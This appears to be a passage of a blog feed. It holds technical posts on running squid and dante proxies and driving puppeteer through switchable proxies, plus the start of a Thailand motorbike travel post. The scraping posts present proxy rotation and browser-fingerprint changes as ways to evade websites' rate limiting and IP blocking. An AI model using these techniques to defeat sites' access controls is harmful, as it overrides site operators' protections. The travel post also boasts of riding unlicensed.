<p>Therefore, we need the intermediate proxy server to have the capability to strip all headers that start with a magic string such as <strong>x-no-forward</strong>.</p>
<p>This is our puppeteer client:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'http://localhost:8000'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="c1">// signal to the intermediate proxy server what upstream proxy we want to use</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setExtraHTTPHeaders</span><span class="p">({</span>
<span class="s1">'x-no-forward-upstream-proxy'</span><span class="o">:</span> <span class="s1">'http://proxyuser:proxypassword@100.100.100.100:3128'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'http://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<p>And this is our intermediate proxy server:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// proxy_server.js</span>
<span class="kd">const</span> <span class="nx">ProxyChain</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'proxy-chain'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">server</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ProxyChain</span><span class="p">.</span><span class="nx">Server</span><span class="p">({</span>
<span class="c1">// Port where the server will listen. By default 8000.</span>
<span class="nx">port</span><span class="o">:</span> <span class="mf">8000</span><span class="p">,</span>
<span class="c1">// Enables verbose logging</span>
<span class="nx">verbose</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="nx">prepareRequestFunction</span><span class="o">:</span> <span class="p">({</span> <span class="nx">request</span><span class="p">,</span> <span class="nx">username</span><span class="p">,</span> <span class="nx">password</span><span class="p">,</span> <span class="nx">hostname</span><span class="p">,</span> <span class="nx">port</span><span class="p">,</span> <span class="nx">isHttp</span><span class="p">,</span> <span class="nx">connectionId</span> <span class="p">})</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">upstream_proxy</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">[</span><span class="s1">'x-no-forward-upstream-proxy'</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">upstream_proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="ne">Error</span><span class="p">(</span><span class="s1">'please set header `x-no-forward-upstream-proxy`'</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">upstreamProxyUrl</span><span class="o">:</span> <span class="nx">upstream_proxy</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">},</span>
<span class="p">});</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">listen</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Proxy server is listening on port </span><span class="si">${</span><span class="nx">server</span><span class="p">.</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP connection is closed</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'connectionClosed'</span><span class="p">,</span> <span class="p">({</span> <span class="nx">connectionId</span><span class="p">,</span> <span class="nx">stats</span> <span class="p">})</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Connection </span><span class="si">${</span><span class="nx">connectionId</span><span class="si">}</span><span class="sb"> closed`</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">stats</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP request fails</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'requestFailed'</span><span class="p">,</span> <span class="p">({</span> <span class="nx">request</span><span class="p">,</span> <span class="nx">error</span> <span class="p">})</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Request </span><span class="si">${</span><span class="nx">request</span><span class="p">.</span><span class="nx">url</span><span class="si">}</span><span class="sb"> failed`</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>
<p>In order to set the upstream proxy via the HTTP header <strong>x-no-forward-upstream-proxy</strong>, a <a href="https://github.com/NikolaiT/proxy-chain/commit/1963f76774c958ec3c63354dda60c965c9f65501#diff-6ea992016c2394768b145c7f24a5b2d9">code modification is required</a> in the source code of the <code>proxy-chain</code> module. </p>
<p>With this small modification, we can switch the proxy server as often as we wish. </p>
<p>First install the modified module directly from github with the command:</p>
<div class="highlight"><pre><span></span><code>npm install NikolaiT/proxy-chain
</code></pre></div>
<p>which installs the <code>proxy-chain</code> fork. Then the server code listed above is launched with the command <code>node proxy_server.js</code>.</p>
<p>An example usage could be the following client program. It can be executed with <code>node proxy_client.js</code> after the server was started.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// proxy_client.js</span>
<span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=http://localhost:8000`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="c1">// signal to the intermediate proxy server what upstream proxy we want to use</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setExtraHTTPHeaders</span><span class="p">({</span>
<span class="s1">'x-no-forward-upstream-proxy'</span><span class="o">:</span> <span class="s1">'http://proxyuser:proxypass@100.100.100.100:3128'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'http://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="c1">// SWITCH THE PROXY SERVER</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setExtraHTTPHeaders</span><span class="p">({</span>
<span class="s1">'x-no-forward-upstream-proxy'</span><span class="o">:</span> <span class="s1">'http://proxyuser:proxypass@200.200.200.200:3128'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'http://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<p>It should output the IP address metadata of two different proxy connections. If that is the case, the experiment <strong>was a success</strong>.</p>
<h2>Solving the problem of missing proxy authentication in chrome</h2>
<p>For completeness sake, it is also shown how to authenticate to a proxy with puppeteer. <code>proxy-chain</code> is <strong>not needed anymore</strong> to solve the chrome/puppeteer authentication problem. We can simply use <code>page.authenticate()</code> to accomplish that.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'http://100.100.100.100:3128'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">authenticate</span><span class="p">({</span>
<span class="nx">username</span><span class="o">:</span> <span class="s1">'proxyuser'</span><span class="p">,</span>
<span class="nx">password</span><span class="o">:</span> <span class="s1">'proxypassword'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<h2>What about socks4/socks5 proxies?</h2>
<p>Browser version:</p>
<div class="highlight"><pre><span></span><code>$ chromium-browser --version
Using PPAPI flash.
Chromium <span class="m">78</span>.0.3904.108 Built on Ubuntu , running on Ubuntu <span class="m">18</span>.04
</code></pre></div>
<p>Unfortunately, the chrome browser only supports socks4 proxies out of the box. Passing a proxy string such as
<code>socks5://proxyuser:proxypass@100.100.100.100:53425</code> to chrome will not work. The following command will not create a connection</p>
<div class="highlight"><pre><span></span><code>chromium-browser --proxy-server<span class="o">=</span><span class="s1">'socks5://proxyuser:proxypass@100.100.100.100:53425'</span> tps://ipinfo.io/json
</code></pre></div>
<p>and fail with <strong>ERR_NO_SUPPORTED_PROXIES</strong>. However, the curl command</p>
<div class="highlight"><pre><span></span><code>curl --proxy socks5://proxyuser:proxypass@100.100.100.100:53425 http://ipinfo.io/json
</code></pre></div>
<p>works flawlessly.</p>
<p>When we use sock4 with the chrome browser, it works as expected:</p>
<div class="highlight"><pre><span></span><code>chromium-browser --proxy-server<span class="o">=</span><span class="s1">'socks://100.100.100.100:53425'</span> https://ipinfo.io/json
</code></pre></div>
<h2>Limitations of http/s proxies</h2>
<p>There are a couple of security issues with http/s proxy servers. It is also possible to detect that a browser reroutes their traffic through a proxy. For example, the module <code>apifytech/proxy-chain</code> deletes the following headers:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">HOP_BY_HOP_HEADERS</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'Connection'</span><span class="p">,</span>
<span class="s1">'Keep-Alive'</span><span class="p">,</span>
<span class="s1">'Proxy-Authenticate'</span><span class="p">,</span>
<span class="s1">'Proxy-Authorization'</span><span class="p">,</span>
<span class="s1">'TE'</span><span class="p">,</span>
<span class="s1">'Trailers'</span><span class="p">,</span>
<span class="s1">'Transfer-Encoding'</span><span class="p">,</span>
<span class="s1">'Upgrade'</span><span class="p">,</span>
<span class="p">];</span>
</code></pre></div>
<p>Since the <code>Upgrade</code> and <code>Connection</code> headers are used in the establishment of websocket connections, the chrome browser won't be able to use websites that require websockets. This can easily be confirmed by testing with this script:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">proxyChain</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'proxy-chain'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">oldProxyUrl</span> <span class="o">=</span> <span class="s1">'http://proxyuser:proxypassword@100.100.100.100:3128'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">newProxyUrl</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">proxyChain</span><span class="p">.</span><span class="nx">anonymizeProxy</span><span class="p">(</span><span class="nx">oldProxyUrl</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">newProxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="c1">// Do your magic here...</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://www.websocket.org/echo.html'</span><span class="p">);</span>
<span class="c1">// oh wait a minute</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">60000</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="c1">// Clean up</span>
<span class="k">await</span> <span class="nx">proxyChain</span><span class="p">.</span><span class="nx">closeAnonymizedProxy</span><span class="p">(</span><span class="nx">newProxyUrl</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>Using http/s and socks4/5 proxies with puppeteer and chrome with squid and danted2020-02-12T21:42:00+01:002020-02-13T13:32:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-12:/2020/02/12/https-and-socks-proxies-with-puppeteer-and-squid-and-danted/<p>This blogs post demonstrates how puppeteer and the chrome browser can be used with http/s and socks4/5 proxies. For that reason, a proxy server is setup on Ubuntu 18.04 with <strong>squid3</strong> and <strong>dante</strong>.</p><h2>For what reason are proxies used when crawling/scraping with puppeteer?</h2>
<p>When we are crawling different websites, it's usually a good idea to change the browsing fingerprint by re-routing the TCP traffic through multiple distinct hops.</p>
<p>By doing so, the crawled website cannot rate limit the clients requests by IP address blacklisting. Put differently, by switching proxy servers, the detection rate can be reduced by a wide margin. </p>
<p>But changing your IP address is <strong>usually not enough</strong>. It's also smart to alter your browser fingerprint in other ways, such as changing the user agent, cleaning session data such as cookies and cached objects and modifying accept-language headers or changing the browser viewpoint.</p>
<p>Scraping and crawling in the year 2020 is usually done with a fully functional browser in order to prevent blocking attempts that build on the requirement to be able to execute javascript. Puppeteer in combination with headless chromium is often used for that matter.</p>
<p>In this blog post, we will learn how Puppeteer/Chromium can be used with </p>
<ol>
<li><strong>Http/Https</strong> proxy support with and without <code>username:password</code> authentication. The proxy server is build with <a href="http://www.squid-cache.org/"><strong>squid3</strong></a>.</li>
<li><strong>Socks</strong> proxy support with and without <code>username:password</code> authentication. The proxy server is setup with <a href="https://www.inet.no/dante/"><strong>dante</strong></a>.</li>
</ol>
<p>For this reason, we will also show instructions how to create your own http/s proxy server and socks proxy server on Ubuntu 18.04.</p>
<h2>Proxy Server Setup</h2>
<p>All proxy server software is going to be installed on a Ubuntu 18.04 server. The only requirement is that the server should have a static, public IP address.</p>
<ol>
<li><strong>Client IP address</strong> (the computer that uses the proxy) = <strong>1.1.1.1</strong></li>
<li><strong>Proxy Server IP address</strong> (the server that <em>is</em> the proxy) = <strong>100.100.100.100</strong></li>
</ol>
<h3>Creating a http/s proxy server with squid3 on Ubuntu 18.04</h3>
<p>Squid is a powerful and mature http/s proxy server and caching software. For our purposes, we are solely interested in the proxying functionality. The configuration is based on a <a href="https://stackoverflow.com/questions/48239975/how-do-i-setup-an-elite-http-squid-proxy-with-password-protection-on-ubuntu">stackoverflow answer</a> that explains in depth how to setup squid to work as an anonymous http/s proxy.</p>
<p>First of all, we need to install the required software packages for <code>squid3</code> to work:</p>
<div class="highlight"><pre><span></span><code>sudo apt-get update
sudo apt-get install squid3
sudo apt-get install apache2-utils
</code></pre></div>
<p>Then we create the password file that <code>squid3</code> is going to use for authentication. This command requires you to enter a password of your choice. We will use the credentials <code>proxyuser:proxypass</code>.</p>
<div class="highlight"><pre><span></span><code>sudo htpasswd -c /etc/squid/.squid_users proxyuser
</code></pre></div>
<p>You can verify that the password works by issuing the following command and enter <code>proxyuser proxypass</code> and pressing enter. You should see <code>OK</code> as output.</p>
<div class="highlight"><pre><span></span><code>/usr/lib/squid3/basic_ncsa_auth /etc/squid/.squid_users
</code></pre></div>
<p>Then we configure the configuration file <code>/etc/squid/squid.conf</code> as follows. Please replace the dummy IP address <strong>100.100.100.100</strong> with the ip address of your own server.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># http_port: specifies the proxy listen port. This is required</span>
http_port <span class="m">3128</span>
<span class="c1"># dns_v4_first on: effectively turns off IPv6 DNS. Without this your proxy may run very slowly.</span>
dns_v4_first on
<span class="c1"># cache deny all: stops the proxy caching pages</span>
cache deny all
<span class="c1"># forwarded_for delete: remove the forwarded_for http header which would expose your source to the destination</span>
forwarded_for delete
<span class="c1"># tcp_outgoing_address: Set this to the address of your server. You can find the address with the command "ip a"</span>
tcp_outgoing_address <span class="m">100</span>.100.100.100
<span class="c1"># via off: removes more headers which would expose your source</span>
via off
<span class="c1"># auth_param: defines your the location of your basic_ncsa_auth and password file you created. Note you may need to check the location of basic_ncsa_auth.</span>
auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid/.squid_users
auth_param basic realm proxy
<span class="c1"># acl authenticated: creates an access control list for user authenticated by the password store</span>
acl authenticated proxy_auth REQUIRED
<span class="c1"># http_access allow authenticated: allow user to access the proxy if they have been authenticated by password</span>
http_access allow authenticated
<span class="c1"># http_access deny all: if you have not been authenticated by password, you're not coming in</span>
http_access deny all
</code></pre></div>
<p>How we need to open the port on the standard firewall of Ubuntu with the command:</p>
<div class="highlight"><pre><span></span><code>ufw allow <span class="m">3128</span>
</code></pre></div>
<p>After having saved the file, restart the <code>squid3</code> service with <code>service squid restart</code>.</p>
<p>Test that everything works fine with curl:</p>
<div class="highlight"><pre><span></span><code>curl --proxy http://proxyuser:proxypass@100.100.100.100:3128 http://ipinfo.io/json
</code></pre></div>
<p>The above command should show you the IP details of the proxy server.</p>
<h3>Configuring a socks proxy server with danted</h3>
<p>In order to create a socks4/socks5 server, we will use <a href="https://www.inet.no/dante/">dante</a>. <strong>dante</strong> is the name of the software, <code>danted</code> stands for <em>dante daemon</em>.</p>
<p>First we show how to configure <code>danted</code> to create a socks4 proxy server, then how to setup socks5. The difference between socks4 and socks5 is essentially that socks5 supports <code>username:password</code> authentication.</p>
<p>In order to begin, you need to install a recent <code>danted</code> server. This has been explained countless times: <a href="https://gist.github.com/gpchelkin/c7d24a21639d1f120fb082d1801a5fe4">Here are decent installation instructions</a>.</p>
<p>After you installed <code>danted</code>, add this configuration to <code>/etc/danted.conf</code>:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># /etc/danted.conf</span>
logoutput: syslog
user.privileged: root
user.unprivileged: nobody
<span class="c1"># The listening network interface or address.</span>
internal: <span class="m">0</span>.0.0.0 <span class="nv">port</span><span class="o">=</span><span class="m">53425</span>
<span class="c1"># The proxying network interface or address.</span>
external: eth0
<span class="c1"># socks-rules determine what is proxied through the external interface.</span>
<span class="c1"># The default of "none" permits anonymous access.</span>
socksmethod: username
<span class="c1"># client-rules determine who can connect to the internal interface.</span>
<span class="c1"># The default of "none" permits anonymous access.</span>
clientmethod: none
client pass <span class="o">{</span>
from: <span class="m">1</span>.1.1.1/16 to: <span class="m">0</span>.0.0.0/0
log: connect disconnect error
<span class="o">}</span>
socks pass <span class="o">{</span>
from: <span class="m">0</span>.0.0.0/0 to: <span class="m">0</span>.0.0.0/0
log: connect disconnect error
<span class="o">}</span>
</code></pre></div>
<p>In my case, I needed to change the external network interface to <strong>ens3</strong>. You can look it up with the <code>ifconfig</code> command.</p>
<p><code>danted</code> uses the credentials username and password of your linux users. Therefore, we create a user with:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># add user</span>
useradd -r -s /bin/false proxyuser
<span class="c1"># set password</span>
passwd proxyuser
</code></pre></div>
<p>Now open the port in the firewall with:</p>
<div class="highlight"><pre><span></span><code>ufw allow <span class="m">53425</span>
</code></pre></div>
<p>Finally, we restart <code>danted</code> with the command <code>service danted restart</code>.</p>
<p>Confirm that the socks server is working by testing it with curl:</p>
<div class="highlight"><pre><span></span><code>curl --proxy socks5://proxyuser:proxypass@100.100.100.100:53425 http://ipinfo.io/json
</code></pre></div>
<p>If we <strong>do not want to use socks authentication</strong>, we edit <code>/etc/danted.conf</code> to alter the line from <code>socksmethod: username</code> to <code>socksmethod: none</code> and issue the command <code>service danted restart</code>.</p>
<p>Then we can test the socks server without auth (which is <strong>socks4</strong>) with:</p>
<div class="highlight"><pre><span></span><code>curl --proxy socks4://100.100.100.100:53425 http://ipinfo.io/json
</code></pre></div>
<h2>Puppeteer with proxies</h2>
<p>Now we can see how to use the http/s and socks proxy server that we configured in the previous steps with a fully functional browser controlled via puppeteer.</p>
<h3>Puppeteer with http/s proxy</h3>
<p>You can test puppeteer with a http proxy by launching the following node script. The output should show IP address details of the proxy.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'http://100.100.100.100:3128'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">authenticate</span><span class="p">({</span>
<span class="nx">username</span><span class="o">:</span> <span class="s1">'proxyuser'</span><span class="p">,</span>
<span class="nx">password</span><span class="o">:</span> <span class="s1">'proxypass'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://ipinfo.io/json'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">screenshot</span><span class="p">({</span> <span class="nx">path</span><span class="o">:</span> <span class="s1">'ipinfo.png'</span><span class="p">,</span> <span class="nx">fullPage</span><span class="o">:</span> <span class="kc">true</span> <span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<h3>Puppeteer with socks4 proxy</h3>
<p>You can test puppeteer in combination with a socks proxy server by launching the following node program. The output should show IP address details of the proxy.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'socks://100.100.100.100:53425'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://ipinfo.io/json'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">screenshot</span><span class="p">({</span> <span class="nx">path</span><span class="o">:</span> <span class="s1">'ipinfo.png'</span><span class="p">,</span> <span class="nx">fullPage</span><span class="o">:</span> <span class="kc">true</span> <span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<h2>Tear down the proxy servers</h2>
<p>To stop the proxy servers, execute the following commands on your servers:</p>
<div class="highlight"><pre><span></span><code>systemctl stop danted
systemctl stop squid
</code></pre></div>
<h2>Known Limitations</h2>
<p>Unfortunately, <strong>it is not possible to use puppeteer/chromium with a socks5 proxy</strong>. The chrome browser does not support socks with authentication.</p>
<p>How to address the problem of <a href="https://incolumitas.com/2020/02/14/dynamically-changing-puppeteer-http-proxy/">switching proxies on the fly</a> without restarting puppeteer/chromium will be handled in the next blog post.</p>5 crucial tips how to survive riding a motorbike/scooter in Thailand (2019)2019-10-26T19:04:00+02:002019-10-26T19:04:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-26:/2019/10/26/5-crucial-tips-how-to-survive-riding-a-motorbike-in-thailand/<p>Thailand is the second most deadly country when it comes to traffic accidents. 80% of all deaths originate from people driving motorbikes. In this blog post, I try to share my experiences in the form of 5 survival tips in a honest way. I drove a scooter on 4 distinct tourist destinations in Thailand without a proper license and wasn't caught in a police checkpoint a single time.</p><p>Except from Libya, <a href="http://www.thaiwebsites.com/caraccidents.asp">Thailand is the second most deadly country in the world</a> for number of road accident deaths. A large share of causalities originate from motorcycle accidents. During my three week trip through Thailand's beautiful nature, I rented a motorbike on the following tourist destinations in Thailand:</p>
<ol>
<li>Koh Tao</li>
<li>Koh Phangan</li>
<li>Krabi</li>
<li>Koh Lanta</li>
</ol>
<p>and managed to survive without a injury (fingers crossed, because I haven't left yet).</p>
<p>During my journey in Thailand, I spoke with an hostel manager who told me about his employee who died a couple of months earlier in an motorbike accident. The next day in the same hostel, when I crossed the road to the motorbike rental shop, the British owner told me that he just picked up a destroyed bike from an earlier accident in the day. The driver was hospitalized with broken legs and wounds.</p>
<p>When I stayed in Koh Lanta, my bungalow neighbors, two swiss girls had an motorbike accident because they lost control of their bike because of wheel ruts and pot holes. The driver suffered a deep cut on her leg and needed seven stiches. The medical bill wasn't the problem, the shock must have been deep. It was the beginning of their one year journey around the world. I don't think they will rent a new scooter that quickly.</p>
<p>When traveling with ferries, you see lots of tourists. It is very common to see tourists with bandages on their legs and arms. They are so called <strong>island tattoes</strong></p>
<p>But if Thailand is so freaking dangerous for motorcyclists, why even expose yourself to the risk?</p>
<p>Well, there are a couple of good reasons why it is a alluring idea to drive a scooter in Thailand.</p>
<ol>
<li>You are flexible and you can visit any amazing beach, restaurant or view point on any island.</li>
<li>Driving a motorbike is a hugely liberating feeling. It's thoroughly enjoyable to cruise through steep island roads on Ko Tao or to visit the non-touristy northern part of Koh Lanta Noi.</li>
<li>Practical reasons: You won't need to pay for transport. Tuk-tuks are very expensive and you often get ripped off by the local taxi men.</li>
<li>Renting a motorbike is very cheap. Prices are as low as 150 baht per day (4 dollars).</li>
</ol>
